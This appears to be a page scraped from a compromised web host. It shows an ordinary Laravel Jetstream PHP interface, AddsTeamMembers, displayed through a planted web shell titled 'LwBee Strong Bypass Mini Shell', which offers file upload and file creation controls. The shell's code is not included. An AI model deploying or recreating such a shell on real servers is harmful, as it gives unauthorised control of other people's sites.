/home/aloic1/public_html/core/vendor/laravel/jetstream/src/Contracts/AddsTeamMembers.php
<?php

namespace Laravel\Jetstream\Contracts;

interface AddsTeamMembers
{
    /**
     * Add a new team member to the given team.
     *
     * @param  mixed  $user
     * @param  mixed  $team
     * @param  string  $email
     * @return void
     */
    public function add($user, $team, string $email, string $role = null);
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File